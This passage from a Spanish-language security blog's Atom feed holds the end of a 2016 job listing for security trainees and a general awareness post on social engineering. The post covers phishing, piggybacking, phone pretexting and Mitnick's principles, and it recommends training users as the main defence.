&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Disponibilidad inmediata&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Ingeniero, TSU o &amp;nbsp;Licenciado en Computación o carreras afines&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Recién graduado o en primeros años de experiencia laboral.&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Buena&amp;nbsp;&lt;span style=&quot;color: black;&quot;&gt;p&lt;/span&gt;resencia, responsable y proactivo&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Interés de aprendizaje en el área de seguridad informática&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Deseable conocimiento en plataforma Unix/Linux (no restrictivo)&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Deseable dominio de idioma ingl&lt;span style=&quot;color: black;&quot;&gt;é&lt;/span&gt;s (no restrictivo)&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Deseable dominio de redes o certificación Cisco (no restrictivo)&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; font-family: Arial, sans-serif;&quot;&gt;Beneficios:&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Remuneración competitiva&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Facilidades y flexibilidad de trabajo&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Grato ambiente&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Entrenamiento&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Contratación inmediata&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial;&quot;&gt;Oportunidad de&amp;nbsp;&lt;span style=&quot;color: black;&quot;&gt;r&lt;/span&gt;elaciona&lt;span style=&quot;color: black;&quot;&gt;rse&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; font-family: Arial, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Las personas interesadas pueden enviar su currículum a&amp;nbsp;&lt;u&gt;&lt;a href=&quot;mailto:empleo@eset.com.ve&quot; style=&quot;color: #1155cc;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: windowtext;&quot;&gt;empleo@eset.com.ve&lt;/span&gt;&lt;/a&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp;Pa&lt;/span&gt;ra cualquier información también pueden contactarnos al&amp;nbsp;&lt;a href=&quot;tel:0212-9064241&quot; style=&quot;color: #1155cc;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: windowtext;&quot;&gt;0212-9064241&lt;/span&gt;&lt;/a&gt;/4233.&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/6359265875660738888/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2016/11/busqueda-en-venezuela-de-talentos-en.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/6359265875660738888'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/6359265875660738888'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2016/11/busqueda-en-venezuela-de-talentos-en.html' title='Búsqueda en Venezuela de talentos en Seguridad de la Información'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7RJBQCdLv3_GFcuaI2Q3Wwb1VP0dwHPIXrNl8pR4hCaPOwJWCBMlqgEHn-N44kCMmiKr17WW_qeZz1U0jwto2YXj0Uf1asYgaT3SxDhLeNyXHqM5hQ5FAluBmgTlHZrcf68niBtTA2nA/s72-c/ofertas-de-empleo.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-4192427674261650526</id><published>2016-11-18T17:29:00.006-04:00</published><updated>2016-11-18T17:42:37.900-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ingeniería Social"/><category scheme="http://www.blogger.com/atom/ns#" term="Kevin Mitnick"/><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad de Información"/><title type='text'>Ingeniería social</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizKmfOGAemIMiDoi9PtYVgXKkbZLjDDIMZqTEns5cuMGACimAHJIBirck37eNDxjCcql3pCHXYQYHoisLgGQ4DElhlJlRB62Gbe_iIOpkKrX4Aq1fIEVMutXsQOnmJgnx41wsjkCsi6Ps/s1600/ingeneria+social.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;420&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizKmfOGAemIMiDoi9PtYVgXKkbZLjDDIMZqTEns5cuMGACimAHJIBirck37eNDxjCcql3pCHXYQYHoisLgGQ4DElhlJlRB62Gbe_iIOpkKrX4Aq1fIEVMutXsQOnmJgnx41wsjkCsi6Ps/s640/ingeneria+social.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Ingeniería social es la práctica de obtener información confidencial a través de la manipulación de usuarios legítimos. Es una técnica que pueden usar ciertas personas, tales como investigadores privados, criminales, o delincuentes informáticos, para obtener información, acceso o privilegios en sistemas de información que les permitan realizar algún acto que perjudique o exponga la persona u organismo comprometido a riesgo o abusos.&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;El principio que sustenta la ingeniería social es el que en cualquier sistema &quot;&lt;a href=&quot;http://siforense.blogspot.com/2016/11/la-importancia-del-factor-humano-en-la.html&quot; target=&quot;_blank&quot;&gt;los usuarios son el eslabón débil&lt;/a&gt;&quot;. En la práctica, un ingeniero social usará comúnmente el teléfono o Internet para engañar a la gente, fingiendo ser, por ejemplo, un empleado de algún banco o alguna otra empresa, un compañero de trabajo, un técnico o un cliente. Vía Internet o la web se usa, adicionalmente, el envío de solicitudes de renovación de permisos de acceso a páginas web o memos falsos que solicitan respuestas e incluso las famosas cadenas, llevando así a revelar información sensible, o a violar las políticas de seguridad típicas. Con este método, los ingenieros sociales aprovechan la tendencia natural de la gente a reaccionar de manera predecible en ciertas situaciones, –por ejemplo proporcionando detalles financieros a un aparente funcionario de un banco– en lugar de tener que encontrar agujeros de seguridad en los sistemas informáticos.&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
La ingeniería Social está definida como un ataque basado en engañar a un usuario o administrador de un sitio en la internet, para poder ver la información que ellos quieren.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Se hace para obtener acceso a sistemas o información útil.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Los objetivos de la ingeniería social son fraude, intrusión de una red, espionaje industrial, robo de identidad, etc.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Quizá el ataque más simple pero muy efectivo sea engañar a un usuario llevándolo a pensar que un administrador del sistema está solicitando una contraseña para varios propósitos legítimos. Los usuarios de sistemas de Internet frecuentemente reciben mensajes que solicitan contraseñas o información de tarjeta de crédito, con el motivo de &quot;crear una cuenta&quot;, &quot;reactivar una configuración&quot;, u otra operación benigna; a este tipo de ataques se los llama phishing (se pronuncia igual que fishing, pesca). Los usuarios de estos sistemas deberían ser advertidos temprana y frecuentemente para que no divulguen contraseñas u otra información sensible a personas que dicen ser administradores. En realidad, los administradores de sistemas informáticos raramente (o nunca) necesitan saber la contraseña de los usuarios para llevar a cabo sus tareas. Sin embargo incluso este tipo de ataque podría no ser necesario –en una encuesta realizada por la empresa Boixnet, el 90 % de los empleados de oficina de la estación Waterloo de Londres reveló sus contraseñas a cambio de un bolígrafo barato–&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Otro ejemplo contemporáneo de un ataque de ingeniería social es el uso de archivos adjuntos en correos electrónicos, ofreciendo, por ejemplo, fotos &quot;íntimas&quot; de alguna persona famosa o algún programa &quot;gratis&quot; (a menudo aparentemente provenientes de alguna persona conocida) pero que ejecutan código malicioso (por ejemplo, usar la máquina de la víctima para enviar cantidades masivas de spam). Ahora, después de que los primeros correos electrónicos maliciosos llevaran a los proveedores de software a deshabilitar la ejecución automática de archivos adjuntos, los usuarios deben activar esos archivos de forma explícita para que ocurra una acción maliciosa. Muchos usuarios, sin embargo, abren casi ciegamente cualquier archivo adjunto recibido, concretando de esta forma el ataque.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
La ingeniería social también se aplica al acto de manipulación cara a cara para obtener acceso a los sistemas informáticos. Otro ejemplo es el conocimiento sobre la víctima, a través de la introducción de contraseñas habituales, lógicas típicas o conociendo su pasado y presente; respondiendo a la pregunta: ¿Qué contraseña introduciría yo si fuese la víctima?&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
La principal defensa contra la ingeniería social es educar y entrenar a los usuarios en el uso de políticas de seguridad y asegurarse de que estas sean seguidas.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAIiklk_sRgc_3K-w314pD9kyDjVilXDHh2Zi4DT5v5bhfRIRLzCgmnYQD29R1AfCw9usXkeCRdWAY9FecUH-Z-TOqk2eYC04d5jiRAO6W1MKIaPfAh_X4ifWlFcLVElA3T7-vrYGfb0I/s1600/kevin_mitnick.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;261&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAIiklk_sRgc_3K-w314pD9kyDjVilXDHh2Zi4DT5v5bhfRIRLzCgmnYQD29R1AfCw9usXkeCRdWAY9FecUH-Z-TOqk2eYC04d5jiRAO6W1MKIaPfAh_X4ifWlFcLVElA3T7-vrYGfb0I/s320/kevin_mitnick.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Uno de los ingenieros sociales más famosos de los últimos tiempos es &lt;a href=&quot;http://siforense.blogspot.com/2016/11/la-importancia-del-factor-humano-en-la.html&quot; target=&quot;_blank&quot;&gt;Kevin Mitnick&lt;/a&gt;. Según su opinión, la ingeniería social se basa en estos cuatro principios:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;Todos queremos ayudar.&lt;/li&gt;
&lt;li&gt;El primer movimiento es siempre de confianza hacia el otro.&lt;/li&gt;
&lt;li&gt;No nos gusta decir No.&lt;/li&gt;
&lt;li&gt;A todos nos gusta que nos alaben.&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Técnicas&amp;nbsp;más comunes de engaño de la Ingeniería&amp;nbsp;Social&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Existen diversos métodos que se utilizan para obtener información confidencial o reservada, entre los cuales podemos hablar de:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Obtención de Información:&lt;/b&gt; búsqueda de información que puede ser utilizada para penetrar en un sistema. Los atacantes crean un vínculo de confianza para animar al usuario a compartir información. La obtención de información puede utilizarse para atacar la seguridad lógica y perimetral de la Organización.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Piggybacking:&lt;/b&gt; es un método muy antiguo para realizar infiltraciones, esta técnica consiste en seguir a una persona sobre una zona de acceso restringido. También se opta por pretender suplantar a una persona para obtener el acceso legítimo de otra persona.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Phishing:&lt;/b&gt; es una de las técnicas más conocidas para realizar un ataque de ingeniería social. Es el engaño de un correo electrónico que ínsita a visitar una web mediante enlaces que suplantan algún sitio oficial. Es normal recibir correos falsos de entidades bancarias y gubernamentales; obteniendo así datos personales que pueden terminar en un fraude.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Las cartas nigerianas:&lt;/b&gt; se conocen así a los mensajes falsos que nos llegan invitándonos o a conseguir una gran cantidad de dinero a cambio de un pequeño desembolso inicial. Un caso frecuente es el de la herencia multimillonaria que ha tenido la gentileza de compartir con nosotros. Otra modalidad es el premio de lotería con el que hemos sido agraciados sin ni siquiera haber jugado.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Ataques por teléfono:&lt;/b&gt; realizar llamadas haciéndose pasar por otra persona, como un técnico de soporte o un empleado de la misma organización.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Explotar la sexualidad:&lt;/b&gt; un ingeniero social puede ganar la confianza al mostrarse atractivo para un individuo en la sociedad, e incluso salir con la persona y el desarrollo de una relación íntima. A veces, un coqueteo hará el truco, y el objetivo será proporcionar la información sin problemas de seguridad perimetral.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/4192427674261650526/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2016/11/ingenieria-social.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/4192427674261650526'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/4192427674261650526'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2016/11/ingenieria-social.html' title='Ingeniería social'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizKmfOGAemIMiDoi9PtYVgXKkbZLjDDIMZqTEns5cuMGACimAHJIBirck37eNDxjCcql3pCHXYQYHoisLgGQ4DElhlJlRB62Gbe_iIOpkKrX4Aq1fIEVMutXsQOnmJgnx41wsjkCsi6Ps/s72-c/ingeneria+social.jpg" height="72" 